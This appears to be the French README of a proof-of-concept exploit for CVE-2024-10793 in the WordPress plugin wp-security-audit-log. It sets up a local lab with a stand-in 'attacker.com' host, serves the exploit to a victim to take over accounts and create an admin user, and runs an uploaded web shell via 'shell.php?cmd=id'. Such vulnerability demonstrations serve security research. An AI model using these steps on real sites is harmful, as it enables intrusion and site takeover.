
Exploit de preuve de concept pour CVE-2024-10793 ciblant le plugin WordPress wp-security-audit-log. Démontre la prise de contrôle de compte, la création d'utilisateurs privilégiés, le téléchargement de shell et la manipulation d'administrateur via des requêtes HTTP conçues.
Ajoutez ces lignes à votre fichier hosts :
127.0.0.1 goodcms.lab
127.0.0.1 attacker.com
Lancez Wordpress avec docker :
$ sudo systemctl start docker
$ sudo docker-compose up -d
Ouvrez http://goodcms.lab:2121 et suivez les étapes d'installation de WordPress. Installez wp-security-audit-log.5.2.1 ou des versions antérieures dans WordPress.
Lancez le serveur attaquant :
$ php -S 0:9091 -t ./exploit
Livrez http://attacker.com à la victime & Bingo !
Impacts de l'exploit :

Prise de contrôle du compte et création d'un utilisateur privilégié PoC : Identifiants de l'attaquant après l'exploit : { email: [email protected], username: amin, password: 123456 } (Vous pouvez les modifier dans le code xpl.js.)
Exécutez la commande shell : http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id
